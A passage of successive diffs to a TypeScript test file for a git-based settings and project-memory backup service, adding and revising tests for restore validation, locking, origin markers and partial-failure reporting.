+    expect(await fs.readFile(path.join(muxRoot, ...memoryPath.split("/")), "utf-8")).toBe(
+      "local edit\n"
+    );
   });
 
   it("reports the memory a failed matched restore already wrote", async () => {

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -14,7 +14,10 @@ import {
 } from "./payload";
 import { MEMORY_MAX_FILE_BYTES } from "@/common/constants/memory";
 import { projectMemoryDirName } from "@/node/services/memoryService";
-import { MAX_BACKUP_PROJECT_ENTRIES } from "@/common/config/schemas/settingsBackup";
+import {
+  MAX_BACKUP_PROJECT_ENTRIES,
+  MAX_BACKUP_PROJECT_PATH_CHARS,
+} from "@/common/config/schemas/settingsBackup";
 import {
   memoryMutationLockKey,
   withTargetMutationLock,
@@ -1989,6 +1992,27 @@ describe("backup adapters project bundle", () => {
     expect((error as Error).message).toContain(`${MAX_BACKUP_PROJECT_ENTRIES}`);
     // Sequential probing of 257 directories would take far longer than the check itself.
     expect(Date.now() - started).toBeLessThan(2_000);
+  });
+
+  it("leaves a project whose registered path exceeds the manifest cap out of the bundle", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    // Registration caps nothing; the manifest schema does. One such project must not fail
+    // every push for all the others.
+    const overlong = path.join(tempDir, "p".repeat(MAX_BACKUP_PROJECT_PATH_CHARS));
+    registerProject(overlong);
+    await seedProjectMemory(project, "notes.md", "alpha notes\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+
+    const { repository } = await exportBundle();
+
+    const manifest = JSON.parse(
+      await fs.readFile(
+        path.join(repository.rootDir, settings.path, "project-bundle", "manifest.json"),
+        "utf-8"
+      )
+    ) as { projects: Array<{ path: string }> };
+    expect(manifest.projects.map((entry) => entry.path)).toEqual([project]);
   });
 
   it("collects project memory for export under the memory mutation lock", async () => {

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -1697,6 +1697,40 @@ describe("backup adapters project bundle", () => {
     });
   });
 
+  it("re-validates matched memory under the lock before touching core settings", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    await seedProjectMemory(project, "notes.md", "backup version\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "backup instructions\n");
+    const memoryDir = projectMemoryDirName(project);
+    const { repository, payload } = await exportBundle();
+    await writeFixtureFile(muxRoot, "AGENTS.md", "local instructions\n");
+
+    const validated = await payload.validateRestore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+    });
+    // Between the preflight and the restore, an in-app memory write turns the incoming
+    // destination into a directory. The restore must fail before the core files change.
+    await fs.rm(path.join(muxRoot, "memory", "project", memoryDir, "notes.md"));
+    await fs.mkdir(path.join(muxRoot, "memory", "project", memoryDir, "notes.md"));
+
+    const error = await captureRejection(
+      payload.restore({
+        repositoryRoot: repository.rootDir,
+        managedPath: settings.path,
+        includeProjects: true,
+        snapshotPath: path.join(tempDir, "restore-snapshot"),
+        matchedProjects: validated.matchedProjects,
+      })
+    );
+    expect((error as Error).message).toContain("non-file");
+    expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe(
+      "local instructions\n"
+    );
+  });
+
   it("refuses a matched destination it could not snapshot before the core restore", async () => {
     const project = path.join(tempDir, "projects", "alpha");
     registerProject(project);

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -1794,25 +1794,34 @@ describe("backup adapters project bundle", () => {
     );
   });
 
-  it("leaves a project alone that was unregistered after the plan was computed", async () => {
+  it("refuses the restore when a validated match was unregistered before the write boundary", async () => {
     const project = path.join(tempDir, "projects", "alpha");
     registerProject(project);
     await seedProjectMemory(project, "notes.md", "backup version\n");
-    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "backup instructions\n");
     const memoryPath = `memory/project/${projectMemoryDirName(project)}/notes.md`;
     const { repository, payload } = await exportBundle();
     await seedProjectMemory(project, "notes.md", "local edit\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "local instructions\n");
 
-    // Unregistered between validation (which matched it) and the write boundary.
+    // Unregistered between validation (which matched it) and the write boundary. The entry
+    // is now an import candidate the caller never saw, so silently skipping it would let the
+    // restore complete with this project's memory neither written nor offered.
     config.state.projects.delete(project);
-    const restored = await payload.restore({
-      repositoryRoot: repository.rootDir,
-      managedPath: settings.path,
-      includeProjects: true,
-      snapshotPath: path.join(tempDir, "restore-snapshot"),
-      matchedProjects: [matchedAt(project)],
-    });
-    expect(restored.changedFiles).not.toContain(memoryPath);
+    const error = await captureRejection(
+      payload.restore({
+        repositoryRoot: repository.rootDir,
+        managedPath: settings.path,
+        includeProjects: true,
+        snapshotPath: path.join(tempDir, "restore-snapshot"),
+        matchedProjects: [matchedAt(project)],
+      })
+    );
+    expect((error as Error).message).toContain("changed since the restore was validated");
+    // Refused before anything changed: neither the core files nor the project's memory.
+    expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe(
+      "local instructions\n"
+    );
     expect(await fs.readFile(path.join(muxRoot, ...memoryPath.split("/")), "utf-8")).toBe(
       "local edit\n"
     );

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -1773,8 +1773,10 @@ describe("backup adapters project bundle", () => {
         })
       );
       expect(error).toBeInstanceOf(ProjectMemoryRestoreError);
+      // The first project's completed write and the second's attempted one both count.
       expect((error as ProjectMemoryRestoreError).restoredProjectMemory).toEqual([
         { projectPath: first, files: [firstMemoryPath] },
+        { projectPath: second, files: [`memory/project/${projectMemoryDirName(second)}/notes.md`] },
       ]);
     } finally {
       mkdir.mockRestore();

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -1984,6 +1984,15 @@ describe("backup adapters project bundle", () => {
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
     });
+    // The preflight sees the re-keyed destination: a conflicting file is not a refusal
+    // (it is skipped add-only), whereas a non-file in the way would be.
+    await importer.assertProjectMemoryAllowed({ token, targetPath });
+    await fs.mkdir(path.join(muxRoot, "memory", "project", targetDir, "notes.md"));
+    const blocked = await captureRejection(
+      importer.assertProjectMemoryAllowed({ token, targetPath })
+    );
+    expect((blocked as Error).message).toContain("non-file");
+    await fs.rmdir(path.join(muxRoot, "memory", "project", targetDir, "notes.md"));
     const imported = await importer.importProjectMemory({ token, targetPath });
 
     expect(imported.writtenFiles).toEqual([`memory/project/${targetDir}/notes.md`]);

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -1410,6 +1410,12 @@ describe("backup adapters project bundle", () => {
     };
   }
 
+  /** The marker file a source's import association is recorded in (keyed by the source's hash). */
+  function originMarkerPath(sourcePath: string): string {
+    const digest = createHash("sha256").update(Buffer.from(sourcePath, "utf-8")).digest("hex");
+    return path.join(muxRoot, "memory", ".backup-origins", `${digest.slice(0, 32)}.json`);
+  }
+
   async function seedProjectMemory(
     projectPath: string,
     fileName: string,
@@ -2111,9 +2117,7 @@ describe("backup adapters project bundle", () => {
     const targetPath = path.join(tempDir, "projects", "alpha-moved");
     const targetDir = projectMemoryDirName(targetPath);
     // A directory squats on the marker's name, so the marker write fails after the notes landed.
-    await fs.mkdir(path.join(muxRoot, "memory", ".backup-origins", `${targetDir}.json`), {
-      recursive: true,
-    });
+    await fs.mkdir(originMarkerPath(project), { recursive: true });
 
     const importer = await payload.prepareProjectImports({
       repositoryRoot: repository.rootDir,
@@ -2271,8 +2275,12 @@ describe("backup adapters project bundle", () => {
     const targetPath = path.join(tempDir, "projects", "alpha-here");
     const targetDir = projectMemoryDirName(targetPath);
     registerProject(targetPath);
-    const marker = `memory/.backup-origins/${targetDir}.json`;
-    await writeFixtureFile(muxRoot, marker, JSON.stringify({ sourcePath: project }));
+    await fs.mkdir(path.dirname(originMarkerPath(project)), { recursive: true });
+    await fs.writeFile(
+      originMarkerPath(project),
+      JSON.stringify({ sourcePath: project, memoryDir: targetDir }),
+      "utf-8"
+    );
     const validated = await payload.validateRestore({
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,
@@ -2283,9 +2291,8 @@ describe("backup adapters project bundle", () => {
     ]);
 
     // While the restore waits for the memory lock, another import (which writes under that
-    // lock) re-points the project at a different source. The plan validated against the old
-    // marker must not be written: it would overwrite this project with the old source's
-    // notes while its marker names the new one.
+    // lock) moves the source to a different local checkout. The plan validated against the
+    // old marker must not be written: this project is no longer the source's local identity.
     const held = Promise.withResolvers<void>();
     const lockAcquired = Promise.withResolvers<void>();
     const holding = withTargetMutationLock(
@@ -2307,7 +2314,11 @@ describe("backup adapters project bundle", () => {
       })
     );
     await new Promise((resolve) => setTimeout(resolve, 100));
-    await writeFixtureFile(muxRoot, marker, JSON.stringify({ sourcePath: "/elsewhere/other" }));
+    await fs.writeFile(
+      originMarkerPath(project),
+      JSON.stringify({ sourcePath: project, memoryDir: projectMemoryDirName("/elsewhere/other") }),
+      "utf-8"
+    );
     held.resolve();
     await holding;
 

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -2034,6 +2034,82 @@ describe("backup adapters project bundle", () => {
     ).toBe("local wins\n");
   });
 
+  it("updates an imported project's memory on later restores instead of re-offering it", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    await seedProjectMemory(project, "notes.md", "v1\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+    const { gitRepo, repository, payload } = await exportBundle();
+    await gitRepo.commitAndPush(repository, {
+      message: "v1",
+      expectedRemoteCommit: repository.remoteCommit,
+    });
+
+    // Fresh machine: import the project under a different path.
+    config.state.projects.delete(project);
+    await fs.rm(path.join(muxRoot, "memory", "project", projectMemoryDirName(project)), {
+      recursive: true,
+      force: true,
+    });
+    const targetPath = path.join(tempDir, "projects", "alpha-here");
+    const targetDir = projectMemoryDirName(targetPath);
+    const checkout = await gitRepo.prepare(settings);
+    const preview = await payload.previewRestore({
+      repositoryRoot: checkout.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+    });
+    const importer = await payload.prepareProjectImports({
+      repositoryRoot: checkout.rootDir,
+      managedPath: settings.path,
+    });
+    await importer.importProjectMemory({ token: preview.projectImports[0].token, targetPath });
+    registerProject(targetPath);
+
+    // The source machine updates the note and pushes; here the imported project must now be
+    // matched and updated — an add-only re-import could never change the existing file.
+    const bundleDir = path.join(checkout.rootDir, settings.path, "project-bundle");
+    const updated = Buffer.from("v2\n");
+    await fs.writeFile(
+      path.join(bundleDir, "memory", "project", projectMemoryDirName(project), "notes.md"),
+      updated
+    );
+    const manifestPath = path.join(bundleDir, "manifest.json");
+    const manifest = JSON.parse(await fs.readFile(manifestPath, "utf-8")) as {
+      files: Array<{ path: string; sha256: string }>;
+    };
+    manifest.files[0].sha256 = createHash("sha256").update(updated).digest("hex");
+    await fs.writeFile(manifestPath, JSON.stringify(manifest), "utf-8");
+
+    const localPath = `memory/project/${targetDir}/notes.md`;
+    const second = await payload.previewRestore({
+      repositoryRoot: checkout.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+    });
+    expect(second.projectImports).toEqual([]);
+    expect(second.changes).toContainEqual({ status: "M", path: localPath });
+
+    const validated = await payload.validateRestore({
+      repositoryRoot: checkout.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+    });
+    expect(validated.matchedProjectPaths).toEqual([project]);
+    const restored = await payload.restore({
+      repositoryRoot: checkout.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+      snapshotPath: path.join(tempDir, "restore-snapshot"),
+      matchedProjectPaths: validated.matchedProjectPaths,
+    });
+    expect(restored.changedFiles).toContain(localPath);
+    expect(restored.restoredProjectMemory).toEqual([
+      { projectPath: targetPath, files: [localPath] },
+    ]);
+    expect(await fs.readFile(path.join(muxRoot, ...localPath.split("/")), "utf-8")).toBe("v2\n");
+  });
+
   it("skips a malformed sidecar when the toggle is off but refuses it when on", async () => {
     await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
     const gitRepo = createBackupGitRepo({ cacheRoot });

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -6,7 +6,13 @@ import * as path from "node:path";
 import type { SettingsBackupInput } from "@/common/orpc/schemas/backup";
 import { createBackupGitRepo, createBackupPayloadStore } from "./adapters";
 import { BackupNonFastForwardError, backupCachePath } from "./gitRepo";
+import { ProjectMemoryRestoreError } from "./payload";
 import { projectMemoryDirName } from "@/node/services/memoryService";
+import { MAX_BACKUP_PROJECT_ENTRIES } from "@/common/config/schemas/settingsBackup";
+import {
+  memoryMutationLockKey,
+  withTargetMutationLock,
+} from "@/node/services/refinement/targetMutationLocks";
 import { TestBackupConfig, captureRejection, runGit, writeFixtureFile } from "./testHelpers";
 
 describe("backup adapters", () => {
@@ -1550,6 +1556,46 @@ describe("backup adapters project bundle", () => {
     ).toBe("local edit\n");
   });
 
+  it("reports the memory a failed matched restore already wrote", async () => {
+    const first = path.join(tempDir, "projects", "alpha");
+    const second = path.join(tempDir, "projects", "beta");
+    registerProject(first);
+    registerProject(second);
+    await seedProjectMemory(first, "notes.md", "alpha backup\n");
+    await seedProjectMemory(second, "notes.md", "beta backup\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+    const firstMemoryPath = `memory/project/${projectMemoryDirName(first)}/notes.md`;
+    const { repository, payload } = await exportBundle();
+    await seedProjectMemory(first, "notes.md", "alpha local\n");
+    await seedProjectMemory(second, "notes.md", "beta local\n");
+
+    // The second project's live memory write fails after the first project's memory was
+    // restored. Scoped to the Xum root so the snapshot copy of the same directory is fine.
+    const secondLiveDir = path.join(muxRoot, "memory", "project", projectMemoryDirName(second));
+    const realMkdir = fs.mkdir.bind(fs);
+    const mkdir = spyOn(fs, "mkdir").mockImplementation(((target, options) =>
+      String(target).startsWith(secondLiveDir)
+        ? Promise.reject(new Error("EIO: disk fault"))
+        : realMkdir(target, options)) as typeof fs.mkdir);
+    try {
+      const error = await captureRejection(
+        payload.restore({
+          repositoryRoot: repository.rootDir,
+          managedPath: settings.path,
+          includeProjects: true,
+          snapshotPath: path.join(tempDir, "restore-snapshot"),
+          matchedProjectPaths: [first, second],
+        })
+      );
+      expect(error).toBeInstanceOf(ProjectMemoryRestoreError);
+      expect((error as ProjectMemoryRestoreError).restoredProjectMemory).toEqual([
+        { projectPath: first, files: [firstMemoryPath] },
+      ]);
+    } finally {
+      mkdir.mockRestore();
+    }
+  });
+
   it("does not overwrite a project that became matched only after validation", async () => {
     const project = path.join(tempDir, "projects", "alpha");
     registerProject(project);
@@ -1628,6 +1674,68 @@ describe("backup adapters project bundle", () => {
         () => false
       )
     ).toBe(false);
+  });
+
+  it("refuses an over-limit project list before probing any remote", async () => {
+    for (let index = 0; index <= MAX_BACKUP_PROJECT_ENTRIES; index += 1) {
+      registerProject(path.join(tempDir, "projects", `p${index}`));
+    }
+    const payload = createBackupPayloadStore({ config });
+    const gitRepo = createBackupGitRepo({ cacheRoot });
+    const repository = await gitRepo.prepare(settings);
+
+    const started = Date.now();
+    const error = await captureRejection(
+      payload.exportTo({
+        repositoryRoot: repository.rootDir,
+        managedPath: settings.path,
+        includeProjects: true,
+      })
+    );
+    expect((error as Error).message).toContain(`${MAX_BACKUP_PROJECT_ENTRIES}`);
+    // Sequential probing of 257 directories would take far longer than the check itself.
+    expect(Date.now() - started).toBeLessThan(2_000);
+  });
+
+  it("collects project memory for export under the memory mutation lock", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    await seedProjectMemory(project, "notes.md", "alpha notes\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
+    const payload = createBackupPayloadStore({ config });
+    const gitRepo = createBackupGitRepo({ cacheRoot });
+    const repository = await gitRepo.prepare(settings);
+
+    // Hold the lock MemoryService takes for mutations; the export must wait for it.
+    const held = Promise.withResolvers<void>();
+    const lockAcquired = Promise.withResolvers<void>();
+    const holding = withTargetMutationLock(
+      muxRoot,
+      memoryMutationLockKey(muxRoot, path.join(muxRoot, "memory")),
+      async () => {
+        lockAcquired.resolve();
+        await held.promise;
+      }
+    );
+    await lockAcquired.promise;
+
+    const progress = { exported: false };
+    const exporting = payload
+      .exportTo({
+        repositoryRoot: repository.rootDir,
+        managedPath: settings.path,
+        includeProjects: true,
+      })
+      .then(() => {
+        progress.exported = true;
+      });
+    await new Promise((resolve) => setTimeout(resolve, 100));
+    expect(progress.exported).toBe(false);
+
+    held.resolve();
+    await holding;
+    await exporting;
+    expect(progress.exported).toBe(true);
   });
 
   it("re-sanitizes a repository-controlled remote before presenting a candidate", async () => {

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -647,7 +647,7 @@ describe("backup adapters", () => {
       managedPath: settings.path,
       includeProjects: false,
       snapshotPath: path.join(tempDir, "restore-snapshot"),
-      matchedProjectPaths: [],
+      matchedProjects: [],
     });
     expect(restored.changedFiles).toEqual(["skills/demo/run.sh"]);
     const mode = (await fs.stat(path.join(muxRoot, "skills/demo/run.sh"))).mode;
@@ -691,7 +691,7 @@ describe("backup adapters", () => {
       managedPath: prepared.managedPath,
       includeProjects: false,
       snapshotPath: path.join(tempDir, "restore-snapshot"),
-      matchedProjectPaths: [],
+      matchedProjects: [],
     });
     expect(restored.changedFiles).toEqual(["AGENTS.md"]);
     expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe(
@@ -778,7 +778,7 @@ describe("backup adapters", () => {
       managedPath: prepared.managedPath,
       includeProjects: false,
       snapshotPath: path.join(tempDir, "restore-snapshot"),
-      matchedProjectPaths: [],
+      matchedProjects: [],
     });
     expect(restored.changedFiles).toEqual(["AGENTS.md"]);
     expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe("canonical\n");
@@ -835,7 +835,7 @@ describe("backup adapters", () => {
       managedPath: prepared.managedPath,
       includeProjects: false,
       snapshotPath: path.join(tempDir, "restore-snapshot"),
-      matchedProjectPaths: [],
+      matchedProjects: [],
     });
     expect(restored.changedFiles).toEqual(["AGENTS.md"]);
     expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe("canonical\n");
@@ -894,7 +894,7 @@ describe("backup adapters", () => {
       managedPath: prepared.managedPath,
       includeProjects: false,
       snapshotPath: path.join(tempDir, "restore-snapshot"),
-      matchedProjectPaths: [],
+      matchedProjects: [],
     });
     expect(restored.changedFiles).toEqual(["AGENTS.md"]);
     expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe(
@@ -946,7 +946,7 @@ describe("backup adapters", () => {
       managedPath: prepared.managedPath,
       includeProjects: false,
       snapshotPath: path.join(tempDir, "restore-snapshot"),
-      matchedProjectPaths: [],
+      matchedProjects: [],
     });
     expect(restored.changedFiles).toEqual(["AGENTS.md"]);
     expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe(
@@ -1142,7 +1142,7 @@ describe("backup adapters", () => {
       managedPath: settings.path,
       includeProjects: false,
       snapshotPath: path.join(tempDir, "restore-snapshot"),
-      matchedProjectPaths: [],
+      matchedProjects: [],
     });
 
     expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe("backed up\n");
@@ -1183,7 +1183,7 @@ describe("backup adapters", () => {
         managedPath: settings.path,
         includeProjects: false,
         snapshotPath: path.join(tempDir, "restore-snapshot"),
-        matchedProjectPaths: [],
+        matchedProjects: [],
       });
       throw new Error("Expected the lost preferences write to be reported");
     } catch (error) {
@@ -1221,7 +1221,7 @@ describe("backup adapters", () => {
       managedPath: settings.path,
       includeProjects: false,
       snapshotPath: path.join(tempDir, "restore-snapshot"),
-      matchedProjectPaths: [],
+      matchedProjects: [],
     });
 
     expect(config.state.userPreferences?.appearance?.theme).toBe("dark");
@@ -1398,6 +1398,15 @@ describe("backup adapters project bundle", () => {
 
   function registerProject(projectPath: string): void {
     config.state.projects.set(projectPath, { workspaces: [] });
+  }
+
+  /** The validated identity of an entry registered at its own recorded path. */
+  function matchedAt(projectPath: string) {
+    return {
+      sourcePath: projectPath,
+      projectPath,
+      localMemoryDir: projectMemoryDirName(projectPath),
+    };
   }
 
   async function seedProjectMemory(
@@ -1598,7 +1607,7 @@ describe("backup adapters project bundle", () => {
       managedPath: settings.path,
       includeProjects: true,
     });
-    expect(validated.matchedProjectPaths).toEqual([project]);
+    expect(validated.matchedProjects).toEqual([matchedAt(project)]);
 
     const snapshotPath = path.join(tempDir, "restore-snapshot");
     const restored = await payload.restore({
@@ -1606,7 +1615,7 @@ describe("backup adapters project bundle", () => {
       managedPath: settings.path,
       includeProjects: true,
       snapshotPath,
-      matchedProjectPaths: validated.matchedProjectPaths,
+      matchedProjects: validated.matchedProjects,
     });
     expect(restored.changedFiles).toContain(memoryPath);
     expect(restored.restoredProjectMemory).toEqual([{ projectPath: project, files: [memoryPath] }]);
@@ -1644,7 +1653,7 @@ describe("backup adapters project bundle", () => {
       managedPath: settings.path,
       includeProjects: true,
       snapshotPath,
-      matchedProjectPaths: [project],
+      matchedProjects: [matchedAt(project)],
     });
     expect(restored.changedFiles).toContain(`memory/project/${memoryDir}/notes.md`);
     const snapshotBundle = JSON.parse(
@@ -1767,7 +1776,7 @@ describe("backup adapters project bundle", () => {
       managedPath: settings.path,
       includeProjects: true,
       snapshotPath: path.join(tempDir, "restore-snapshot"),
-      matchedProjectPaths: [project],
+      matchedProjects: [matchedAt(project)],
     });
     expect(restored.changedFiles).not.toContain(memoryPath);
     expect(await fs.readFile(path.join(muxRoot, ...memoryPath.split("/")), "utf-8")).toBe(
@@ -1803,7 +1812,7 @@ describe("backup adapters project bundle", () => {
           managedPath: settings.path,
           includeProjects: true,
           snapshotPath: path.join(tempDir, "restore-snapshot"),
-          matchedProjectPaths: [first, second],
+          matchedProjects: [matchedAt(first), matchedAt(second)],
         })
       );
       expect(error).toBeInstanceOf(ProjectMemoryRestoreError);
@@ -1835,7 +1844,7 @@ describe("backup adapters project bundle", () => {
       managedPath: settings.path,
       includeProjects: true,
       snapshotPath: path.join(tempDir, "restore-snapshot"),
-      matchedProjectPaths: [],
+      matchedProjects: [],
     });
     expect(restored.changedFiles).not.toContain(memoryPath);
     expect(restored.restoredProjectMemory).toEqual([]);
@@ -1886,7 +1895,7 @@ describe("backup adapters project bundle", () => {
       managedPath: settings.path,
       includeProjects: true,
       snapshotPath: path.join(tempDir, "restore-snapshot"),
-      matchedProjectPaths: [],
+      matchedProjects: [],
     });
     expect(restored.changedFiles.some((file) => file.startsWith("memory/project"))).toBe(false);
     expect(
@@ -2058,7 +2067,7 @@ describe("backup adapters project bundle", () => {
     const targetPath = path.join(tempDir, "projects", "alpha-moved");
     const targetDir = projectMemoryDirName(targetPath);
     // A directory squats on the marker's name, so the marker write fails after the notes landed.
-    await fs.mkdir(path.join(muxRoot, "memory", "project", targetDir, ".backup-origin.json"), {
+    await fs.mkdir(path.join(muxRoot, "memory", ".backup-origins", `${targetDir}.json`), {
       recursive: true,
     });
 
@@ -2136,13 +2145,16 @@ describe("backup adapters project bundle", () => {
       managedPath: settings.path,
       includeProjects: true,
     });
-    expect(validated.matchedProjectPaths).toEqual([project]);
+    // Matched through the origin: recorded source, local destination.
+    expect(validated.matchedProjects).toEqual([
+      { sourcePath: project, projectPath: targetPath, localMemoryDir: targetDir },
+    ]);
     const restored = await payload.restore({
       repositoryRoot: checkout.rootDir,
       managedPath: settings.path,
       includeProjects: true,
       snapshotPath: path.join(tempDir, "restore-snapshot"),
-      matchedProjectPaths: validated.matchedProjectPaths,
+      matchedProjects: validated.matchedProjects,
     });
     expect(restored.changedFiles).toContain(localPath);
     expect(restored.restoredProjectMemory).toEqual([
@@ -2179,7 +2191,7 @@ describe("backup adapters project bundle", () => {
       managedPath: settings.path,
       includeProjects: false,
       snapshotPath: path.join(tempDir, "restore-snapshot"),
-      matchedProjectPaths: [],
+      matchedProjects: [],
     });
     expect(restored.projectBundleSkipped).toBe(true);
 
@@ -2221,7 +2233,7 @@ describe("backup adapters project bundle", () => {
       managedPath: settings.path,
       includeProjects: true,
       snapshotPath,
-      matchedProjectPaths: [matchedProject],
+      matchedProjects: [matchedAt(matchedProject)],
     });
     const snapshotBundle = JSON.parse(
       await fs.readFile(path.join(snapshotPath, "project-bundle", "manifest.json"), "utf-8")

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -2206,6 +2206,74 @@ describe("backup adapters project bundle", () => {
     expect(await fs.readFile(path.join(muxRoot, ...localPath.split("/")), "utf-8")).toBe("v2\n");
   });
 
+  it("re-reads origin markers at the write boundary, inside the memory lock", async () => {
+    const project = path.join(tempDir, "projects", "alpha");
+    registerProject(project);
+    await seedProjectMemory(project, "notes.md", "alpha backup\n");
+    await writeFixtureFile(muxRoot, "AGENTS.md", "local instructions\n");
+    const { repository, payload } = await exportBundle();
+
+    // The project lives here under another path, imported earlier from this source.
+    config.state.projects.delete(project);
+    await fs.rm(path.join(muxRoot, "memory", "project", projectMemoryDirName(project)), {
+      recursive: true,
+      force: true,
+    });
+    const targetPath = path.join(tempDir, "projects", "alpha-here");
+    const targetDir = projectMemoryDirName(targetPath);
+    registerProject(targetPath);
+    const marker = `memory/.backup-origins/${targetDir}.json`;
+    await writeFixtureFile(muxRoot, marker, JSON.stringify({ sourcePath: project }));
+    const validated = await payload.validateRestore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+    });
+    expect(validated.matchedProjects).toEqual([
+      { sourcePath: project, projectPath: targetPath, localMemoryDir: targetDir },
+    ]);
+
+    // While the restore waits for the memory lock, another import (which writes under that
+    // lock) re-points the project at a different source. The plan validated against the old
+    // marker must not be written: it would overwrite this project with the old source's
+    // notes while its marker names the new one.
+    const held = Promise.withResolvers<void>();
+    const lockAcquired = Promise.withResolvers<void>();
+    const holding = withTargetMutationLock(
+      muxRoot,
+      memoryMutationLockKey(muxRoot, path.join(muxRoot, "memory")),
+      async () => {
+        lockAcquired.resolve();
+        await held.promise;
+      }
+    );
+    await lockAcquired.promise;
+    const restoring = captureRejection(
+      payload.restore({
+        repositoryRoot: repository.rootDir,
+        managedPath: settings.path,
+        includeProjects: true,
+        snapshotPath: path.join(tempDir, "restore-snapshot"),
+        matchedProjects: validated.matchedProjects,
+      })
+    );
+    await new Promise((resolve) => setTimeout(resolve, 100));
+    await writeFixtureFile(muxRoot, marker, JSON.stringify({ sourcePath: "/elsewhere/other" }));
+    held.resolve();
+    await holding;
+
+    const error = await restoring;
+    expect((error as Error).message).toContain("changed since the restore was validated");
+    expect(await fs.readFile(path.join(muxRoot, "AGENTS.md"), "utf-8")).toBe(
+      "local instructions\n"
+    );
+    expect(
+      await fs
+        .lstat(path.join(muxRoot, "memory", "project", targetDir, "notes.md"))
+        .catch(() => null)
+    ).toBeNull();
+  });
+
   it("skips a malformed sidecar when the toggle is off but refuses it when on", async () => {
     await writeFixtureFile(muxRoot, "AGENTS.md", "instructions\n");
     const gitRepo = createBackupGitRepo({ cacheRoot });

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -1416,6 +1416,20 @@ describe("backup adapters project bundle", () => {
     return path.join(muxRoot, "memory", ".backup-origins", `${digest.slice(0, 32)}.json`);
   }
 
+  /** The project-side record of the same association (keyed by the memory dir's hash). */
+  function originTargetPath(memoryDir: string): string {
+    const digest = createHash("sha256").update(Buffer.from(memoryDir, "utf-8")).digest("hex");
+    return path.join(muxRoot, "memory", ".backup-origins", `target-${digest.slice(0, 32)}.json`);
+  }
+
+  /** Both halves of an association, as a completed import leaves them. */
+  async function writeOriginRecords(sourcePath: string, memoryDir: string): Promise<void> {
+    const content = JSON.stringify({ sourcePath, memoryDir });
+    await fs.mkdir(path.dirname(originMarkerPath(sourcePath)), { recursive: true });
+    await fs.writeFile(originMarkerPath(sourcePath), content, "utf-8");
+    await fs.writeFile(originTargetPath(memoryDir), content, "utf-8");
+  }
+
   async function seedProjectMemory(
     projectPath: string,
     fileName: string,
@@ -2096,6 +2110,19 @@ describe("backup adapters project bundle", () => {
     expect(
       await fs.readFile(path.join(muxRoot, "memory", "project", targetDir, "conflict.md"), "utf-8")
     ).toBe("local wins\n");
+
+    // Not promoted to a matched project while a conflict was skipped: a matched restore
+    // overwrites, and "local wins" is exactly the file this import promised to leave alone.
+    registerProject(targetPath);
+    const again = await payload.previewRestore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: true,
+    });
+    expect(again.projectImports.map((item) => item.sourcePath)).toEqual([project]);
+    expect(again.changes.map((change) => change.path)).not.toContain(
+      `memory/project/${targetDir}/conflict.md`
+    );
   });
 
   it("keeps reporting written files when the origin marker cannot be written", async () => {
@@ -2275,12 +2302,7 @@ describe("backup adapters project bundle", () => {
     const targetPath = path.join(tempDir, "projects", "alpha-here");
     const targetDir = projectMemoryDirName(targetPath);
     registerProject(targetPath);
-    await fs.mkdir(path.dirname(originMarkerPath(project)), { recursive: true });
-    await fs.writeFile(
-      originMarkerPath(project),
-      JSON.stringify({ sourcePath: project, memoryDir: targetDir }),
-      "utf-8"
-    );
+    await writeOriginRecords(project, targetDir);
     const validated = await payload.validateRestore({
       repositoryRoot: repository.rootDir,
       managedPath: settings.path,

--- a/src/node/services/backup/adapters.test.ts
+++ b/src/node/services/backup/adapters.test.ts
@@ -40,7 +40,7 @@ describe("backup adapters", () => {
     const repository = await gitRepo.prepare(settings);
